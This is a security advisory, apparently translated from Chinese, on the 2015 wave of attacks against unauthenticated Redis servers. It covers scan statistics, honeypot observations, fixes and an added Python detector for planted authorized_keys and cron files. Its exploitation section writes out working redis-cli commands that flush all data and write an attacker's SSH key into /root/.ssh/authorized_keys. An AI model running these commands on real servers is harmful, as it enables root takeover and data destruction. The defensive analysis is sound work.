A comprehensive analysis of the Redis incident - vulnerability warning - the black bar safety net

ID MYHACK58:62201569262
Type myhack58
Reporter Anonymous
Modified 2015-11-22T00:00:00


Redis unauthorized access had not been taken seriously until November 4, when this article broke the news: through Redis you can write an SSH key and then take control of the server. Security staff then started paying a lot of attention to this event.

0x01 Vulnerability profile

If a Redis service exposed on the public Internet does not enable authentication, or uses a weak username/password pair, an attacker can log in maliciously and take control of the server by writing an SSH public key, or by writing a crontab entry that executes commands.

0x02 Impact

Baidu's Titan platform scanned the whole Internet for the default Redis port. Comparing two days of data, it found that Redis has still not been taken seriously by the affected companies.

The weak credentials used in the scan were:

Usernames: root, admin, redis, administrator, webadmin, sysadmin, netadmin
Passwords: 123456, 12345, 123456789, password, ILOVEYOU, redis, root, admin, 12345678, 1234567

Domestic Redis status: China is the country suffering the most harm. (Chart: main data.)

(Chart: distribution of domestic unauthorized Redis instances by city.)

0x03 Exploitation

Method one: using the Redis SET command, write your own generated SSH public key into the user's .ssh directory, giving passwordless SSH login.

    $ ssh-keygen -t rsa                                              # generate a key pair
    $ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt     # pad the public key with newlines so it stays on its own line inside the dump
    $ redis-cli -h 192.168.1.11 flushall                            # delete all databases and keys so no other data is mixed into the written file; use with caution
    $ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit        # write the data (-x reads the value from stdin)
    $ redis-cli -h 192.168.1.11
    192.168.1.11:6379> config set dir /root/.ssh/                   # set the save path
    192.168.1.11:6379> config set dbfilename "authorized_keys"      # set the database file name
    192.168.1.11:6379> save                                         # write the database contents to /root/.ssh/authorized_keys

Saving overwrites the existing authorized_keys, so any passwordless login configured before will stop working.

Method two: write into the crontab and let cron execute it. Using a Redis `set 1 'xxx'` command so that the written data always comes first ensures the execution succeeds, but the written data is large. Crontab's requirements on file format are relatively loose. On CentOS the file is written into the /var/spool/cron directory; the steps otherwise follow method one.

0x04 Tracking the intrusions

We deployed several honeypots ourselves and watched them with redis monitor:

    redis-cli -h xx.xx.xx.xx monitor > ksdf.log

Then we monitored the log. One honeypot captured an intrusion command within an hour (screenshot).

Greetings from our Ukrainian comrade: this IP appears in our collected proxy list, so it is most likely just a jump host. His public key was captured in the log, along with two more public keys from other accesses.

Summary: since a Redis save overwrites the file, multiple hackers or groups have been competing for the final write. If you find your Redis suddenly emptied, and `keys *` on the default database 0 shows only "crackit" or other strange keys, then "congratulations", you have been hit.

0x05 Fix recommendations

1. Add authentication to your Redis; do not expose it to the public network unless necessary, and do not run Redis as root.
2. Whitelist the port you use in iptables.
3. Check your authorized_keys and your crontab tasks; if they begin with REDIS, reset them.
4. If you confirm the machine has been hacked, check it for rootkits with chkrootkit and rootkit hunter.
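Recommendation 3 comes down to a file-content check: a file planted by `config set dbfilename ...; save` is a Redis RDB dump, not a hand-written key or cron file. The following script is an added example, not part of the article; the default paths, the RDB version byte string and the sample file contents are constructed for illustration, while the `crackit` key name is the one the article reports.

```python
import re
from pathlib import Path

# A file written by Redis SAVE is an RDB dump: it starts with the magic "REDIS"
# plus a four-digit version (e.g. "REDIS0006"), followed by binary records.
RDB_MAGIC = re.compile(rb"\AREDIS\d{4}")
# sshd skips unparseable lines in authorized_keys but honours any well-formed
# key line buried in the dump, which is why the planted file still grants login.
SSH_KEY = re.compile(rb"(?:ssh-(?:rsa|dss|ed25519)|ecdsa-sha2-nistp\d+) [A-Za-z0-9+/=]+")

def inspect_file(data: bytes) -> dict:
    """Classify the raw content of an authorized_keys or crontab file."""
    control = any(b < 0x20 and b not in (0x09, 0x0A, 0x0D) for b in data)
    return {
        "redis_dump": RDB_MAGIC.match(data) is not None,
        "marker_key_crackit": b"crackit" in data,
        "embedded_ssh_keys": [m.group(0).decode() for m in SSH_KEY.finditer(data)],
        "binary_junk": control,
    }

def is_planted(data: bytes) -> bool:
    """True when the file looks like a Redis dump rather than an edited text file."""
    r = inspect_file(data)
    return r["redis_dump"] or (r["binary_junk"] and bool(r["embedded_ssh_keys"]))

def scan_paths(paths=("/root/.ssh/authorized_keys", "/var/spool/cron/root")) -> dict:
    """Check the files the article names (assumed default paths); missing files are skipped."""
    results = {}
    for p in paths:
        f = Path(p)
        if f.is_file():
            results[p] = is_planted(f.read_bytes())
    return results

# Constructed samples (not captured data): a normal key file, and a dump shaped
# like what "config set dbfilename authorized_keys; save" leaves behind.
CLEAN = b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7constructedKey== ops@bastion\n"
PLANTED = (
    b"REDIS0006\xfe\x00"                                   # header, SELECTDB 0
    b"\x00\x07crackit\x40\x5d"                             # key "crackit", value length
    b"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCplantedKey== \n\n\n"
    b"\xff\x00\x00\x00\x00\x00\x00\x00\x00"                # EOF marker + checksum
)

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("planted", PLANTED)):
        print(name, inspect_file(blob), "PLANTED" if is_planted(blob) else "ok")
    print(scan_paths())
```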